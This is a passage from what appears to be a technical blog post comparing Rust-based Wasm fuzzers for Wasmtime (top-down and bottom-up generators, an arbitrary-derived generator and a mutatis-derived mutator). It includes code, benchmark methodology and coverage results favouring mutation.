            <span class="o">*</span><span class="n">m</span> <span class="o">=</span> <span class="n">u</span><span class="nf">.int_in_range</span><span class="p">(</span><span class="mi">0</span><span class="o">..=</span><span class="p">(</span><span class="n">num_memories</span> <span class="o">-</span> <span class="mi">1</span><span class="p">))</span><span class="o">?</span><span class="p">;</span>
        <span class="p">}</span>
        <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">{}</span>
    <span class="p">}</span>

    <span class="nf">Ok</span><span class="p">(</span><span class="n">inst</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<p>After constructing a <code class="language-plaintext highlighter-rouge">Module</code> via <code class="language-plaintext highlighter-rouge">bottom_up</code>, we don’t need to call <code class="language-plaintext highlighter-rouge">fixup</code>
because the module is already valid by construction, so all that’s left is
invoking <code class="language-plaintext highlighter-rouge">Module::to_wasm_binary</code> to get the encoded Wasm program.</p>

<h4><code class="language-plaintext highlighter-rouge">top_down</code></h4>

<p>The <code class="language-plaintext highlighter-rouge">top_down</code> generator is very similar to <code class="language-plaintext highlighter-rouge">bottom_up</code>, but instead of
generating instructions forwards, from operands to operators, it generates them
backwards, from operators to operands. Instead of maintaining a stack of the
types of values generated thus far by the instruction sequence prefix, it
maintains a stack of the types of values expected by the instruction sequence
suffix. This is the approach that <a href="https://insuyun.github.io/pubs/2025/park:rgfuzz.pdf"><code class="language-plaintext highlighter-rouge">rgfuzz</code></a> by Park, Kim, and Yun
takes.<sup><a class="footnote" href="https://fitzgeraldnick.com/weblog/feeds/latest-atom/#fn:rule-guided" rel="footnote">2</a></sup></p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">impl</span> <span class="n">Module</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="k">fn</span> <span class="nf">top_down</span><span class="p">(</span>
        <span class="n">u</span><span class="p">:</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">Unstructured</span><span class="o">&lt;</span><span class="nv">'_</span><span class="o">&gt;</span><span class="p">,</span>
    <span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="k">Self</span><span class="o">&gt;</span> <span class="p">{</span>
        <span class="c1">// ...</span>

        <span class="k">let</span> <span class="n">max_insts</span> <span class="o">=</span> <span class="n">u</span><span class="nf">.int_in_range</span><span class="p">(</span><span class="mi">1</span><span class="o">..=</span><span class="n">MAX_INSTS</span><span class="p">)</span><span class="o">?</span><span class="p">;</span>
        <span class="k">let</span> <span class="k">mut</span> <span class="n">instructions</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
        <span class="k">let</span> <span class="k">mut</span> <span class="n">needed</span> <span class="o">=</span> <span class="n">result_types</span><span class="nf">.clone</span><span class="p">();</span>
        <span class="k">for</span> <span class="n">_</span> <span class="k">in</span> <span class="mi">0</span><span class="o">..</span><span class="n">max_insts</span> <span class="p">{</span>
            <span class="k">if</span> <span class="n">needed</span><span class="nf">.is_empty</span><span class="p">()</span> <span class="o">&amp;&amp;</span> <span class="n">u</span><span class="nf">.ratio</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span> <span class="mi">4</span><span class="p">)</span><span class="o">?</span> <span class="p">{</span>
                <span class="k">break</span><span class="p">;</span>
            <span class="p">}</span>

            <span class="c1">// Choose a random instruction in a</span>
            <span class="c1">// top-down manner.</span>
            <span class="k">let</span> <span class="n">inst</span> <span class="o">=</span> <span class="nf">choose_inst_top_down</span><span class="p">(</span>
                <span class="n">u</span><span class="p">,</span>
                <span class="n">needed</span><span class="nf">.last</span><span class="p">()</span><span class="nf">.copied</span><span class="p">(),</span>
                <span class="o">&amp;</span><span class="n">param_types</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="n">globals</span><span class="p">,</span>
                <span class="n">num_memories</span><span class="p">,</span>
            <span class="p">)</span><span class="o">?</span><span class="p">;</span>

            <span class="c1">// Pop the result type from `needed`, if</span>
            <span class="c1">// any, as it's been satisfied.</span>
            <span class="k">let</span> <span class="n">ty</span> <span class="o">=</span> <span class="n">inst</span><span class="nf">.result_type</span><span class="p">(</span>
                <span class="o">&amp;</span><span class="n">param_types</span><span class="p">,</span>
                <span class="o">&amp;</span><span class="n">globals</span><span class="p">,</span>
            <span class="p">);</span>
            <span class="k">if</span> <span class="n">ty</span> <span class="o">==</span> <span class="n">needed</span><span class="nf">.last</span><span class="p">()</span><span class="nf">.copied</span><span class="p">()</span> <span class="p">{</span>
                <span class="n">needed</span><span class="nf">.pop</span><span class="p">();</span>
            <span class="p">}</span>

            <span class="c1">// Add operand type demands.</span>
            <span class="k">match</span> <span class="o">&amp;</span><span class="n">inst</span> <span class="p">{</span>
                <span class="nn">Inst</span><span class="p">::</span><span class="nb">Drop</span> <span class="k">=&gt;</span> <span class="p">{</span>
                    <span class="c1">// `drop` is polymorphic; choose</span>
                    <span class="c1">// a random type.</span>
                    <span class="n">needed</span><span class="nf">.push</span><span class="p">(</span><span class="n">u</span><span class="nf">.arbitrary</span><span class="p">()</span><span class="o">?</span><span class="p">);</span>
                <span class="p">}</span>
                <span class="nn">Inst</span><span class="p">::</span><span class="nf">GlobalSet</span><span class="p">(</span><span class="n">g</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span>
                    <span class="n">needed</span><span class="nf">.push</span><span class="p">(</span><span class="n">globals</span><span class="p">[</span><span class="o">*</span><span class="n">g</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">]</span><span class="py">.ty</span><span class="p">);</span>
                <span class="p">}</span>
                <span class="n">_</span> <span class="k">=&gt;</span> <span class="p">{</span>
                    <span class="n">needed</span><span class="nf">.extend_from_slice</span><span class="p">(</span>
                        <span class="n">inst</span><span class="nf">.operand_types</span><span class="p">(</span><span class="o">&amp;</span><span class="n">globals</span><span class="p">),</span>
                    <span class="p">);</span>
                <span class="p">}</span>
            <span class="p">}</span>

            <span class="n">instructions</span><span class="nf">.push</span><span class="p">(</span><span class="n">inst</span><span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// Fill remaining needed types with</span>
        <span class="c1">// constants.</span>
        <span class="k">for</span> <span class="n">ty</span> <span class="k">in</span> <span class="n">needed</span><span class="nf">.iter</span><span class="p">()</span><span class="nf">.rev</span><span class="p">()</span> <span class="p">{</span>
            <span class="n">instructions</span><span class="nf">.push</span><span class="p">(</span>
                <span class="n">ty</span><span class="nf">.make_const</span><span class="p">(</span><span class="n">u</span><span class="nf">.arbitrary</span><span class="p">()</span><span class="o">?</span><span class="p">),</span>
            <span class="p">);</span>
        <span class="p">}</span>

        <span class="c1">// Instructions were generated backwards, so</span>
        <span class="c1">// reverse.</span>
        <span class="n">instructions</span><span class="nf">.reverse</span><span class="p">();</span>

        <span class="nf">Ok</span><span class="p">(</span><span class="n">Module</span> <span class="p">{</span>
            <span class="n">param_types</span><span class="p">,</span>
            <span class="n">result_types</span><span class="p">,</span>
            <span class="n">globals</span><span class="p">,</span>
            <span class="n">num_memories</span><span class="p">,</span>
            <span class="n">instructions</span><span class="p">:</span> <span class="n">prefix</span><span class="p">,</span>
        <span class="p">})</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="k">fn</span> <span class="nf">choose_inst_top_down</span><span class="p">(</span>
    <span class="n">u</span><span class="p">:</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">Unstructured</span><span class="o">&lt;</span><span class="nv">'_</span><span class="o">&gt;</span><span class="p">,</span>
    <span class="n">target_ty</span><span class="p">:</span> <span class="nb">Option</span><span class="o">&lt;</span><span class="n">ValType</span><span class="o">&gt;</span><span class="p">,</span>
    <span class="n">param_types</span><span class="p">:</span> <span class="o">&amp;</span><span class="p">[</span><span class="n">ValType</span><span class="p">],</span>
    <span class="n">globals</span><span class="p">:</span> <span class="o">&amp;</span><span class="p">[</span><span class="n">Global</span><span class="p">],</span>
    <span class="n">num_memories</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span>
<span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="n">Inst</span><span class="o">&gt;</span> <span class="p">{</span>
    <span class="k">let</span> <span class="k">mut</span> <span class="n">candidates</span><span class="p">:</span> <span class="nb">Vec</span><span class="o">&lt;</span><span class="n">Inst</span><span class="o">&gt;</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
    <span class="k">match</span> <span class="n">target_ty</span> <span class="p">{</span>
        <span class="nf">Some</span><span class="p">(</span><span class="n">I32</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">I32Const</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I32Add</span><span class="p">);</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I32Sub</span><span class="p">);</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I32Mul</span><span class="p">);</span>
            <span class="c1">// ...</span>
        <span class="p">}</span>
        <span class="nf">Some</span><span class="p">(</span><span class="n">I64</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">I64Const</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I64Add</span><span class="p">);</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I64Sub</span><span class="p">);</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">I64Mul</span><span class="p">);</span>
            <span class="c1">// ...</span>
        <span class="p">}</span>
        <span class="nf">Some</span><span class="p">(</span><span class="n">F32</span><span class="p">)</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">F32Const</span><span class="p">(</span><span class="mf">0.0</span><span class="p">));</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">F32Add</span><span class="p">);</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">F32Sub</span><span class="p">);</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="n">F32Mul</span><span class="p">);</span>
            <span class="c1">// ...</span>
        <span class="p">}</span>
        <span class="c1">// ...</span>
        <span class="nb">None</span> <span class="k">=&gt;</span> <span class="p">{</span>
            <span class="c1">// Nothing needed. `drop`, `global.set`, and</span>
            <span class="c1">// stores add demand.</span>
            <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nb">Drop</span><span class="p">);</span>
            <span class="k">if</span> <span class="n">globals</span><span class="nf">.iter</span><span class="p">()</span><span class="nf">.any</span><span class="p">(|</span><span class="n">g</span><span class="p">|</span> <span class="n">g</span><span class="py">.mutable</span><span class="p">)</span> <span class="p">{</span>
                <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">GlobalSet</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span>
            <span class="p">}</span>
            <span class="k">if</span> <span class="n">num_memories</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="p">{</span>
                <span class="n">candidates</span><span class="nf">.push</span><span class="p">(</span><span class="nn">Inst</span><span class="p">::</span><span class="nf">I32Store</span><span class="p">(</span><span class="mi">0</span><span class="p">));</span>
                <span class="c1">// ...</span>
            <span class="p">}</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="k">let</span> <span class="k">mut</span> <span class="n">inst</span> <span class="o">=</span> <span class="o">*</span><span class="n">u</span><span class="nf">.choose</span><span class="p">(</span><span class="o">&amp;</span><span class="n">candidates</span><span class="p">)</span><span class="o">?</span><span class="p">;</span>

    <span class="c1">// If the instruction has immediates, generate</span>
    <span class="c1">// them here, as they were hard-coded during</span>
    <span class="c1">// candidate selection. Same as `bottom_up`.</span>
    <span class="k">match</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="n">inst</span> <span class="p">{</span>
        <span class="c1">// ...</span>
    <span class="p">}</span>

    <span class="nf">Ok</span><span class="p">(</span><span class="n">inst</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Similar to <code class="language-plaintext highlighter-rouge">bottom_up</code>, after we’ve constructed a <code class="language-plaintext highlighter-rouge">Module</code> via <code class="language-plaintext highlighter-rouge">top_down</code>, we
don’t need to call <code class="language-plaintext highlighter-rouge">fixup</code> because the module is already valid by construction.
All that’s left is invoking <code class="language-plaintext highlighter-rouge">Module::to_wasm_binary</code> to get the encoded Wasm
program.</p>

<h4><code class="language-plaintext highlighter-rouge">mutate</code></h4>

<p><code class="language-plaintext highlighter-rouge">mutate</code> is, as the name implies, a mutator rather than a generator. It is the
direct equivalent of the <code class="language-plaintext highlighter-rouge">arb</code> generator, but for mutation: it uses
<code class="language-plaintext highlighter-rouge">derive(mutatis::Mutate)</code> on <code class="language-plaintext highlighter-rouge">Module</code> and <code class="language-plaintext highlighter-rouge">Inst</code> to automatically generate
custom mutators for these types, rather than authoring them by hand. After
producing a new <code class="language-plaintext highlighter-rouge">Module</code> by mutating an old <code class="language-plaintext highlighter-rouge">Module</code>, that new <code class="language-plaintext highlighter-rouge">Module</code> probably
represents an invalid Wasm program, in the same way that
<code class="language-plaintext highlighter-rouge">derive(arbitrary::Arbitrary)</code> produces <code class="language-plaintext highlighter-rouge">Module</code>s that are probably invalid. And
<code class="language-plaintext highlighter-rouge">mutate</code> also uses the same approach that <code class="language-plaintext highlighter-rouge">arb</code> does to resolve this problem:
the <code class="language-plaintext highlighter-rouge">fixup</code> method.</p>

<p>But first, a mutator-specific wrinkle is that <code class="language-plaintext highlighter-rouge">fuzz_mutator!</code> gives us a mutable
byte slice to mutate, not a <code class="language-plaintext highlighter-rouge">Module</code>. We address this gap by deriving the
<a href="https://serde.rs/"><code class="language-plaintext highlighter-rouge">serde</code></a> crate’s <code class="language-plaintext highlighter-rouge">Serialize</code> and <code class="language-plaintext highlighter-rouge">Deserialize</code> traits on <code class="language-plaintext highlighter-rouge">Module</code> and <code class="language-plaintext highlighter-rouge">Inst</code>,
deserializing a <code class="language-plaintext highlighter-rouge">Module</code> from the mutable byte slice, mutating that deserialized
<code class="language-plaintext highlighter-rouge">Module</code> with <code class="language-plaintext highlighter-rouge">mutatis</code>, and then reserializing it back into the mutable byte
slice. We use the <a href="https://docs.rs/postcard"><code class="language-plaintext highlighter-rouge">postcard</code></a> crate here, but could just as easily use
<a href="https://docs.rs/bincode"><code class="language-plaintext highlighter-rouge">bincode</code></a>, JSON, or protobuf.</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">use</span> <span class="nn">libfuzzer_sys</span><span class="p">::{</span><span class="n">fuzz_mutator</span><span class="p">,</span> <span class="n">fuzz_target</span><span class="p">,</span> <span class="n">fuzzer_mutate</span><span class="p">};</span>

<span class="nd">fuzz_mutator!</span><span class="p">(|</span>
    <span class="n">data</span><span class="p">:</span> <span class="o">&amp;</span><span class="k">mut</span> <span class="p">[</span><span class="nb">u8</span><span class="p">],</span>
    <span class="n">size</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>
    <span class="n">max_size</span><span class="p">:</span> <span class="nb">usize</span><span class="p">,</span>
    <span class="n">seed</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span>
<span class="p">|</span> <span class="p">{</span>
    <span class="c1">// With probability of about 1/8, use default</span>
    <span class="c1">// mutator.</span>
    <span class="k">if</span> <span class="n">seed</span><span class="nf">.count_ones</span><span class="p">()</span> <span class="o">%</span> <span class="mi">8</span> <span class="o">==</span> <span class="mi">0</span> <span class="p">{</span>
        <span class="k">return</span> <span class="nf">fuzzer_mutate</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">max_size</span><span class="p">);</span>
    <span class="p">}</span>

    <span class="c1">// Try to decode using postcard; fallback to</span>
    <span class="c1">// default input on failure.</span>
    <span class="k">let</span> <span class="k">mut</span> <span class="n">module</span><span class="p">:</span> <span class="n">Module</span> <span class="o">=</span>
        <span class="nn">postcard</span><span class="p">::</span><span class="nf">from_bytes</span><span class="p">(</span><span class="o">&amp;</span><span class="n">data</span><span class="p">[</span><span class="o">..</span><span class="n">size</span><span class="p">])</span>
            <span class="nf">.ok</span><span class="p">()</span>
            <span class="nf">.unwrap_or_default</span><span class="p">();</span>

    <span class="c1">// Mutate with `mutatis`.</span>
    <span class="k">let</span> <span class="k">mut</span> <span class="n">session</span> <span class="o">=</span> <span class="nn">mutatis</span><span class="p">::</span><span class="nn">Session</span><span class="p">::</span><span class="nf">new</span><span class="p">()</span>
        <span class="nf">.seed</span><span class="p">(</span><span class="n">seed</span><span class="nf">.into</span><span class="p">())</span>
        <span class="nf">.shrink</span><span class="p">(</span><span class="n">max_size</span> <span class="o">&lt;</span> <span class="n">size</span><span class="p">);</span>
    <span class="k">if</span> <span class="n">session</span><span class="nf">.mutate</span><span class="p">(</span><span class="o">&amp;</span><span class="k">mut</span> <span class="n">module</span><span class="p">)</span><span class="nf">.is_ok</span><span class="p">()</span> <span class="p">{</span>
        <span class="k">if</span> <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="n">encoded</span><span class="p">)</span> <span class="o">=</span> <span class="nn">postcard</span><span class="p">::</span><span class="nf">to_slice</span><span class="p">(</span>
            <span class="o">&amp;</span><span class="n">module</span><span class="p">,</span>
            <span class="n">data</span><span class="p">,</span>
        <span class="p">)</span> <span class="p">{</span>
            <span class="k">return</span> <span class="n">encoded</span><span class="nf">.len</span><span class="p">();</span>
        <span class="p">}</span>
    <span class="p">}</span>

    <span class="c1">// Fallback to the default libfuzzer mutator if</span>
    <span class="c1">// serialization or mutation fails because, for</span>
    <span class="c1">// example, `data` doesn't have enough capacity.</span>
    <span class="nf">fuzzer_mutate</span><span class="p">(</span><span class="n">data</span><span class="p">,</span> <span class="n">size</span><span class="p">,</span> <span class="n">max_size</span><span class="p">)</span>
<span class="p">});</span>
</code></pre></div></div>

<p>Finally, the fuzz target itself deserializes the <code class="language-plaintext highlighter-rouge">Module</code> from the raw bytes,
calls <code class="language-plaintext highlighter-rouge">fixup</code>, encodes it to a Wasm binary via <code class="language-plaintext highlighter-rouge">Module::to_wasm_binary</code>, and
then passes that into Wasmtime.</p>

<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">fuzz_target!</span><span class="p">(|</span><span class="n">data</span><span class="p">:</span> <span class="o">&amp;</span><span class="p">[</span><span class="nb">u8</span><span class="p">]|</span> <span class="p">{</span>
    <span class="k">let</span> <span class="nf">Ok</span><span class="p">(</span><span class="k">mut</span> <span class="n">module</span><span class="p">)</span> <span class="o">=</span> <span class="nn">postcard</span><span class="p">::</span><span class="nn">from_bytes</span><span class="p">::</span><span class="o">&lt;</span><span class="n">Module</span><span class="o">&gt;</span><span class="p">(</span><span class="n">data</span><span class="p">)</span> <span class="k">else</span> <span class="p">{</span>
        <span class="k">return</span><span class="p">;</span>
    <span class="p">};</span>
    <span class="n">module</span><span class="nf">.fixup</span><span class="p">(||</span> <span class="mi">0</span><span class="p">);</span>
    <span class="k">let</span> <span class="n">wasm</span> <span class="o">=</span> <span class="n">module</span><span class="nf">.to_wasm_binary</span><span class="p">();</span>

    <span class="c1">// ...</span>
<span class="p">});</span>
</code></pre></div></div>

<h3>Benchmarking</h3>

<h4>Methodology</h4>

<p>We pair each of our generators and mutator with <a href="https://github.com/rust-fuzz/libfuzzer"><code class="language-plaintext highlighter-rouge">libfuzzer-sys</code></a> and feed the
resulting test cases into <a href="https://wasmtime.dev/">Wasmtime</a>. All fuzzers start with an empty corpus.</p>

<p>The most important metric for a fuzzer is its bug-finding ability, but that can
be difficult to measure directly. For example, Wasmtime is actively fuzzed 24/7
with more-complete fuzzers than those implemented here, so, as expected, I have
not found any bugs via these benchmarks. Therefore, instead of reporting a
found-bugs count, the benchmark harness reports two alternative metrics:</p>

<ol>
  <li>
    <p><strong><em>Coverage over time:</em></strong> Coverage is the cumulative code paths exercised by
the fuzzer. A fuzzer cannot find bugs in code paths it does not cover. <em>This
is the most important metric reported.</em></p>
  </li>
  <li>
    <p><strong><em>Executions over time:</em></strong> An execution is one iteration of the fuzzing
loop. This is basically measuring how fast the fuzzer can produce test
cases. All else being equal, more executions is better, but all else is
rarely equal. It is easy to generate poor test cases very quickly: just
return an empty sequence of Wasm instructions every time. Unfortunately, that
exclusively leads to useless executions. Therefore, this metric is really
only useful when comparing two implementations of the same algorithm, and
I’ve omitted its results in the next section.</p>
  </li>
</ol>

<p>Additionally, I report results for both 24 hours of fuzzing and 5 minutes of
fuzzing. The expected behavior of long-term fuzzing, e.g. 24/7 fuzzing in
<a href="https://github.com/google/oss-fuzz">OSS-Fuzz</a>, can be extrapolated from the 24-hour results. The 5-minute results
show the expected behavior of short-term fuzzing, e.g. when using
<a href="https://docs.rs/mutatis/latest/mutatis/check/index.html"><code class="language-plaintext highlighter-rouge">mutatis::check</code></a> or <a href="https://docs.rs/arbtest/latest/arbtest/"><code class="language-plaintext highlighter-rouge">arbtest</code></a>.</p>

<p>Discussion of short-term fuzzing is somewhat rare, so I feel its motivation
deserves explanation. I find short-term fuzzing useful in the following
scenarios, for example:</p>

<ul>
  <li>Running a quick fuzzing session locally, to catch bugs that avoid detection in
the traditional unit- and integration-test suites, before opening a pull
request.</li>
  <li>Running some quick fuzzing in CI before allowing a pull request to merge, for
similar reasons.</li>
</ul>

<p>That is, short-term fuzzing is useful for the same reasons and in the same
scenarios as property-based testing.<sup><a class="footnote" href="https://fitzgeraldnick.com/weblog/feeds/latest-atom/#fn:pbt" rel="footnote">3</a></sup></p>

<p>As recommended in <a href="https://arxiv.org/abs/1808.09700"><em>Evaluating Fuzz Testing</em></a> by Klees, Ruef, Cooper,
Wei, and Hicks and adopted in <a href="https://storage.googleapis.com/gweb-research2023-media/pubtools/6318.pdf"><em>Fuzz Bench: An Open Fuzzer Benchmarking Platform
and Service</em></a> by Metzman, Szekeres, Simon, Sprabery, and Arya, the
benchmark harness tests the statistical significance of its results with a
<a href="https://en.wikipedia.org/wiki/Mann%E2%80%93Whitney_U_test">Mann-Whitney U-test</a>. The harness performs 20 trials per fuzzer, the same
number of trials as <em>Fuzz Bench</em>.</p>

<h4>Results</h4>

<h5>24 Hours of Fuzzing</h5>

<ul>
  <li>
    <p><code class="language-plaintext highlighter-rouge">arb</code> has 1.00 ± 0.00 times more coverage than <code class="language-plaintext highlighter-rouge">bottom_up</code> (p = 0.01)</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">mutate</code> has 1.01 ± 0.00 times more coverage than <code class="language-plaintext highlighter-rouge">arb</code> (p = 0.00)</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">top_down</code> has 1.00 ± 0.00 times more coverage than <code class="language-plaintext highlighter-rouge">arb</code> (p = 0.00)</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">mutate</code> has 1.02 ± 0.00 times more coverage than <code class="language-plaintext highlighter-rouge">bottom_up</code> (p = 0.00)</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">top_down</code> has 1.01 ± 0.00 times more coverage than <code class="language-plaintext highlighter-rouge">bottom_up</code> (p = 0.00)</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">mutate</code> has 1.01 ± 0.00 times more coverage than <code class="language-plaintext highlighter-rouge">top_down</code> (p = 0.00)</p>
  </li>
</ul>

<p><a href="https://raw.githubusercontent.com/fitzgen/fuzz-experiment/9c059bbe2835b2123ed379994eec76fe9278e962/results-24h/coverage-over-time.svg">
  <img src="https://raw.githubusercontent.com/fitzgen/fuzz-experiment/9c059bbe2835b2123ed379994eec76fe9278e962/results-24h/coverage-over-time.svg">
</a></p>

<h5>5 Minutes of Fuzzing</h5>

<ul>
  <li>
    <p><code class="language-plaintext highlighter-rouge">bottom_up</code> has 1.01 ± 0.01 times more coverage than <code class="language-plaintext highlighter-rouge">arb</code> (p = 0.04)</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">mutate</code> has 1.47 ± 0.02 times more coverage than <code class="language-plaintext highlighter-rouge">arb</code> (p = 0.00)</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">top_down</code> has 1.06 ± 0.02 times more coverage than <code class="language-plaintext highlighter-rouge">arb</code> (p = 0.00)</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">mutate</code> has 1.45 ± 0.01 times more coverage than <code class="language-plaintext highlighter-rouge">bottom_up</code> (p = 0.00)</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">top_down</code> has 1.05 ± 0.02 times more coverage than <code class="language-plaintext highlighter-rouge">bottom_up</code> (p = 0.00)</p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">mutate</code> has 1.38 ± 0.02 times more coverage than <code class="language-plaintext highlighter-rouge">top_down</code> (p = 0.00)</p>
  </li>
</ul>

<p><a href="https://raw.githubusercontent.com/fitzgen/fuzz-experiment/9c059bbe2835b2123ed379994eec76fe9278e962/results-5m/coverage-over-time.svg">
  <img src="https://raw.githubusercontent.com/fitzgen/fuzz-experiment/9c059bbe2835b2123ed379994eec76fe9278e962/results-5m/coverage-over-time.svg">
</a></p>

<h3>Conclusion</h3>

<p><strong>The <code class="language-plaintext highlighter-rouge">mutate</code> fuzzer performs best.</strong> It vastly outperforms all the others at 5
minutes of fuzzing (36-49% more coverage), and while the rest narrow that gap
after 24 hours of fuzzing, <code class="language-plaintext highlighter-rouge">mutate</code> maintains its lead (1-2% more coverage).</p>

<p>The comparison between <code class="language-plaintext highlighter-rouge">arb</code> and <code class="language-plaintext highlighter-rouge">mutate</code> is as apples-to-apples of a comparison
as it gets between idiomatic test-case generation and mutation in Rust:
<code class="language-plaintext highlighter-rouge">derive(Arbitrary)</code> and <code class="language-plaintext highlighter-rouge">derive(Mutate)</code>. They use the same <code class="language-plaintext highlighter-rouge">fixup</code> method to
ensure that the resulting Wasm instructions are valid. The fuzzer built with
<code class="language-plaintext highlighter-rouge">mutatis</code> and test-case mutation provides better coverage over time than the
fuzzer built with <code class="language-plaintext highlighter-rouge">arbitrary</code> and test-case generation. When writing
structure-aware fuzzers, I used to reach for <a href="https://github.com/rust-fuzz/arbitrary"><code class="language-plaintext highlighter-rouge">arbitrary</code></a>; in the future, I
will reach for <a href="https://docs.rs/mutatis"><code class="language-plaintext highlighter-rouge">mutatis</code></a> instead.</p>

<p>The <code class="language-plaintext highlighter-rouge">top_down</code> fuzzer performs second-best, and is best of the generation-based
fuzzers. This aligns with results from the <a href="https://insuyun.github.io/pubs/2025/park:rgfuzz.pdf"><code class="language-plaintext highlighter-rouge">rgfuzz</code></a> paper, which found that
top-down Wasm instruction generation resulted in better instruction diversity
than bottom-up generation. This result is intuitive, they point out, because
Wasm instructions tend to have more operands than results, which means that more
candidates are filtered out from consideration when generating instructions in
forward order from operands to results (bottom-up) than when generating them in
backward order from results to operands (top-down).</p>

<p>Subjectively, none of the approaches feel significantly more-complicated nor
easier to implement than the others. All approaches require a stack of types,
representing the generated Wasm’s operand stack, at some point in their
implementation. Some require it during instruction generation (<code class="language-plaintext highlighter-rouge">top_down</code> and
<code class="language-plaintext highlighter-rouge">bottom_up</code>) while others require it during <code class="language-plaintext highlighter-rouge">fixup</code> (<code class="language-plaintext highlighter-rouge">mutate</code> and <code class="language-plaintext highlighter-rouge">arb</code>). Adding
support for new Wasm instructions is roughly the same in all of them: add a new
variant to <code class="language-plaintext highlighter-rouge">enum Inst</code> and define its operand and result types. <code class="language-plaintext highlighter-rouge">top_down</code> and
<code class="language-plaintext highlighter-rouge">bottom_up</code> additionally require adding a line for the new instruction in their
<code class="language-plaintext highlighter-rouge">choose_inst_{top_down,bottom_up}</code> functions, but this could be avoided with
some targeted <code class="language-plaintext highlighter-rouge">macro_rules!</code> sugar.</p>

<p>The <code class="language-plaintext highlighter-rouge">fixup</code> method fixes instructions in a forwards order; as future work, it
would be interesting to implement a <code class="language-plaintext highlighter-rouge">backwards_fixup</code> method that fixes
instructions in a backwards order and see if <code class="language-plaintext highlighter-rouge">mutate</code> and <code class="language-plaintext highlighter-rouge">backwards_fixup</code>
outperforms the current <code class="language-plaintext highlighter-rouge">mutate</code> and forwards <code class="language-plaintext highlighter-rouge">fixup</code> the same way that
backwards generation (<code class="language-plaintext highlighter-rouge">top_down</code>) outperforms forwards generation
(<code class="language-plaintext highlighter-rouge">bottom_up</code>).</p>

<p><code class="language-plaintext highlighter-rouge">fixup</code> makes an attempt to reuse stack operands when it can, rather than
synthesize dummy constants or <code class="language-plaintext highlighter-rouge">drop</code> already-computed values, but the attempt is
somewhat half-hearted. Dropping operands introduces dead code, which is not very
interesting for exercising deep into the compiler pipeline. Dummy constants are
not that interesting either. Therefore, another potential line of follow-up work
would be to investigate ways to maximize operand reuse and minimize <code class="language-plaintext highlighter-rouge">drop</code>s and
